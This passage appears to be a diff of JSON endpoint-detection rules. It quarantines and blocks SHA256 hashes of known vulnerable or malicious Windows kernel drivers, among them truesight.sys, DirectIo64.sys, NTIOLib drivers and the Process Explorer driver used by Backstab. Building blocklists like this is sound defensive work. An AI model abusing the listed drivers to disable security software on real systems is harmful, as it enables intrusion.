+ "value": "1b52289bc4c5ce08fa3d1ab31d0c74c86564a39415cd55178e859d79b8f16117",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e03db9f2-a2d3-5028-98d0-bcd97c55374b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822736Z",
+ "creation_date": "2026-03-23T11:45:31.822739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42d9b12949e06581c571488e2ff0725cf8d871f7405cab958e43c1bc71867a12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e040864e-2a64-5391-8d15-aec54a1385b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500735Z",
+ "creation_date": "2026-03-23T11:45:31.500738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a54b5b088967e6f65f37cf67c88e67c96a95487024d57cf39993b356898e5c45",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0468411-5a02-5b72-8e45-12f2ea534bde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604129Z",
+ "creation_date": "2026-03-23T11:45:29.604131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c29e726448ad3e6452b5d186afb4668e6fcc942be512fe25ed72cfa1b73a6007",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0505e7d-9e80-58f4-8cb0-ea6878de642b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622668Z",
+ "creation_date": "2026-03-23T11:45:29.622670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94be67c319a67de75ebed050d5537cfaa795d72bba52f3d8cf349e7bd075410e",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e054a1e8-3565-5de2-aa8c-90effc3edca5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620981Z",
+ "creation_date": "2026-03-23T11:45:29.620983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0790e85-36bc-5afa-8d7a-8be260cfb549",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826138Z",
+ "creation_date": "2026-03-23T11:45:31.826140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edf3fff43d2c3ec7530359d6042a4837238da206d2aa2381d698e3c10037381d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e07cc808-7faf-597c-bf8b-80fd01024b3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155558Z",
+ "creation_date": "2026-03-23T11:45:31.155560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4543a2cf342355f2b1ac4e79b126115076b6cb2ebbc62529782378cf2b42cc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e090feec-2655-5af2-9ee6-30946610a2f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476274Z",
+ "creation_date": "2026-03-23T11:45:31.476278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476288Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24a915857be068a8463703543fff24c763654d7d4ce6be40c7326fa148f6256c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0911209-0e96-5071-8a07-1d12cd50e46e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829061Z",
+ "creation_date": "2026-03-23T11:45:30.829063Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "778214a28e54d8e912649dd155e1ecd6d726bb7e9b0838acfc31786cf9654529",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e09c6930-6c1b-57b2-ae10-d2f297e2c3a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140547Z",
+ "creation_date": "2026-03-23T11:45:31.140549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1bba43e137244ad10af8166cfe65780d1d42428cd0caba37ce5902f72187a208",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e09d84c6-03a2-54ad-b4cc-765ab16a6e21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475216Z",
+ "creation_date": "2026-03-23T11:45:30.475219Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "648994905b29b9c4a1074eef332bf6932b638bad62df020b5452c74e2b15d78f",
+ "comment": "Vulnerable Kernel Driver (aka semav6msr.sys) [https://www.loldrivers.io/drivers/142453a2-a24d-4b35-8922-6d5939f1c0fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e09e8f67-f283-5401-909b-698973374f55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493171Z",
+ "creation_date": "2026-03-23T11:45:31.493174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "799a8563d1b6efbfe833116c8af3b619bdf658ddba39cff7c7bb35e3f430b76b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0c45fe2-421a-503d-ba84-3f298ad5a79b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978353Z",
+ "creation_date": "2026-03-23T11:45:29.978355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0c65e9c-03cf-590e-8e72-7d6bd8b2a89a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488134Z",
+ "creation_date": "2026-03-23T11:45:31.488136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488142Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f631ad95bb296997a4d86cdcae9a5f4d2a05b47bdfab471b0905369bbbf4a32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0c6c1e7-7981-5c79-a6af-acb20f39b7d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809315Z",
+ "creation_date": "2026-03-23T11:45:31.809318Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f34be2c55f8a0102fedc6362afca94528c7ca5f52d5e260b64a5948b2723aad9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0d679e1-613d-53ad-abf6-8530048afdd5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144718Z",
+ "creation_date": "2026-03-23T11:45:31.144720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cd869794481f84f25229883550c0f02597f5ad1c44a3c5724ef0cddd236d4e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0e51d84-9daf-5b1a-969b-f709939b5a32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493293Z",
+ "creation_date": "2026-03-23T11:45:31.493295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de4d8898dc5f8aadfe91dcf6735867e1fd204e0877a9ea8b0ccfd5d85a1dac8c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0ecb629-6364-5f83-bcb2-4d33f5bf794f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981782Z",
+ "creation_date": "2026-03-23T11:45:29.981784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79e7165e626c7bde546cd1bea4b9ec206de8bed7821479856bdb0a2adc3e3617",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0f005b5-4ef7-52d6-87b6-3b66572a1ae4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149771Z",
+ "creation_date": "2026-03-23T11:45:31.149773Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149779Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92f884e715a70dd25c030410f9b03b17ad8aacabc524fa081979abffbd00d744",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e0f4d53b-da5a-5a82-8c15-a2dabae7788a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146026Z",
+ "creation_date": "2026-03-23T11:45:32.146029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146034Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e055fdfb914e3da936eb7745acb665f50346df9abac597cf43d487262a6a12d5",
+ "comment": "Malicious Kernel Driver (aka kavservice.bin) [https://www.loldrivers.io/drivers/77157886-00f9-4f6e-b217-d896813b630f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e1027d6a-d5e2-5b56-ae59-586d13148821",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615451Z",
+ "creation_date": "2026-03-23T11:45:29.615453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa861c61102cbcaa1e5f6020deaa066c4fcdfaee3ded1ee156ab81d59ad54f9a",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e10de787-42a8-5045-9d48-f1f478df1b75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605395Z",
+ "creation_date": "2026-03-23T11:45:29.605397Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdfbe62ef515546f1728189260d0bdf77167063b6dbb77f1db6ed8b61145a2bc",
+ "comment": "Backstab Process Explorer driver (aka PROCEXP.SYS) [https://github.com/Yaxser/Backstab/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e10ff572-a15d-5cef-9a2e-3bea9f95590e",
